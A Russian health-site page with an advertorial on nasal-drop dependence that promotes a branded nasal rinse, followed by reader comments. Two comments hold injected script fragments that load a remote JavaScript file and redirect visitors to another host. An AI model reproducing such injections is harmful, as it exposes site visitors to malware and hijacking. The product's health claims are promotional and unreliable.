Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Капельная зависимость – ж...  >>  Капельная зависимость – жуткая вещь
 
Обратная связь
 

Капельная зависимость – жуткая вещь

Размер шрифта
03 февраля 2014 00:00
  • google_analytics: false
  • Нравится

 «…Может, кто знает, как справиться с этой напастью – настоящая зависимость от капель для носа? Сначала был насморк, лечиться было некогда, на работе надо было чувствовать себя на все 100 и говорить не в нос... Потом думала, что аллергия на собачью шерсть. В итоге насморк прошел, из квартиры, где жила собака, я переехала, а без капель жить не могу. Каждые 3-4 часа закладывает нос полностью, пыталась перетерпеть – задыхаюсь, голова раскалывается, плохо. Иногда, даже ночью просыпаюсь, куда бы ни пошла, везде со мной должны быть капли. Даже подумать боюсь, что с моей слизистой носа и что будет дальше. Кому-то удалось справиться с такой проблемой? Помогите, пожалуйста!»

Такие и подобные вопросы пользователей  в этом году с  огромными темпами заваливают сейчас все форумы и сайты, связанные со здоровьем.

Капельная зависимость – жуткая вещь

Сосудосуживающие капли в нос на основе 4,5-Дигидро-2-(1-нафталинилметил)-1H-имидазола, появились еще в первой половине XX века. Их часто используют во время насморка без консультации со специалистом. Врачи не рекомендуют увлекаться таким «самолечением» по ряду причин.

Риск получить осложнения и гайморит

Сосудосуживающие капли кажутся эффективным лекарством от насморка – закапал и через 5 минут нос сухой, дышит. Но на самом деле они не устраняют болезнь, а лишь ненадолго маскируют симптомы. Во время насморка слизистая оболочка носа отекает, закрывает носовые ходы, и воздух не может пройти через нос в легкие. Сосудосуживающие капли сокращают сосуды слизистой, поэтому отек на время спадает, носовые ходы расширяются. Как только действие капель проходит, насморк возвращается с новой силой.

Вызывают привыкание

В инструкции к большинству капель написано, что их нельзя использовать дольше 3-5 дней. Если нарушить это правило, происходит привыкание, возникает зависимость, сходная с наркотической. Дело в том, что носовые раковины состоят из особого типа ткани, которая то сокращается, то расслабляется. Постоянно давая сосудам команду  сокращаться, мы нарушаем этот естественный процесс. В результате сосуды носовых ходов становятся «ленивыми» и прекращают самостоятельную работу. Поэтому зависимые от капель люди постоянно чувствуют заложенность носа. Со временем им требуется все большая доза капель, чтобы нос задышал.

Побочные эффекты

Постоянное химическое воздействие капель оказывает разрушительное воздействие на слизистую носа. Снижается обоняние, местный иммунитет, появляется постоянное ощущение сухости носа, корки. Но, к сожалению, негативные последствия такого злоупотребления этим не ограничиваются. «Воздействие на сосуды нарушает кровообращени, причем не только в носу, но и в головном мозге. В результате появляются частые головные боли, вялость, раздражительность, ухудшается зрение, могут даже быть судороги. Бьет зависимость от капель и по сосудам сердца: возрастает риск инфарктов, инсультов», – рассказывает врач-оториноларинголог Татьяна Бабич.

Капельная зависимость – жуткая вещь

Лечите насморк правильно

Первое, что нужно сделать при признаках насморка – это обратиться к специалисту для выявления истинных причин и постановки правильного диагноза. И назначения тех препаратов, которые будут вам показаны. Обязательно внимательно читайте инструкции по применению и следуйте этим указаниям и рекомендациям врача.

Для комплексного лечения насморка Всемирная Организация Здравоохранения рекомендует промывания носа. Практически любой профильный специалист сможет вам рассказать, как это делать самостоятельно и безопасно в домашних условиях с помощью средства для промывания носа «Долфин» в состав которого входят только натуральные компоненты.

Благодаря этому «Долфин» оказывает антибактериальное, противовоспалительное, иммуномодулирующее, антисептическое действие, восстанавливая здоровье слизистой. «Долфин» разрешен к применению даже на всем сроке беременности и детям с 4 лет.

Важно, что применение «Долфин» повышает эффективность местных лекарственных средств. На очищенной слизистой лекарства будут  действовать быстрее и эффективнее.  

www.dolphin.ru

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

03 февраля 2014 в 07:04

Цитировать   |   Пожаловаться

Много раз слышала о пользе промывания носа.. Но всё как-то не решалась. Сегодня спрошу в аптеке это устройство, надеюсь, поможет!

2 - Гость

05 февраля 2014 в 12:05

Цитировать   |   Пожаловаться

Я промываю нос Долфином при насморке, помогает хорошо. Не знала, что можно еще при нафтизиновой заивисмости. Девушка моего брата очень ей мучается. Помню, нам один раз пришлось на полдороге возвращаться за каплями, потому что она их дома забыла. Ужас. 

3 - Гость

15 мая 2014 в 12:13

Цитировать   |   Пожаловаться

Как лечить насморк?                                                                             Без преувеличения, с насморком знакомы мы все, и приятным это знакомство назовешь едва ли. Так что же делать, смириться и ждать пока, как гласит поговорка, он сам за некоторое количество дней пройдет? Мы вам такого не посоветуем: один из вариантов развития неизлеченного насморка – гайморит. Особенно, если вы не болеете в свое удовольствие, попивая дома чаек с таблеточками, а переносите очередную простуду на ногах. Если все же работа или неотложные дела погнали вас на улицу, неприятные симптомы вполне можно притормозить на время. В аптеках полно препаратов на любой вкус и кошелек, блокирующих заложенность носа и насморк на энное количество часов. Следует помнить, однако, что такие препараты, в основном, снимают симптомы, а не лечат причину. Сделав все неотложные дела, подумайте все же о важности своего невосполнимого ресурса – здоровья. Для того, чтобы это сделать, будет вполне достаточно использовать противовирусный спрей, который активно борется с вирусами и насморком. Поддержите свое здоровье!

4 - zzzzzz

30 июня 2015 в 18:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?   Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Как избавиться от насморка
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.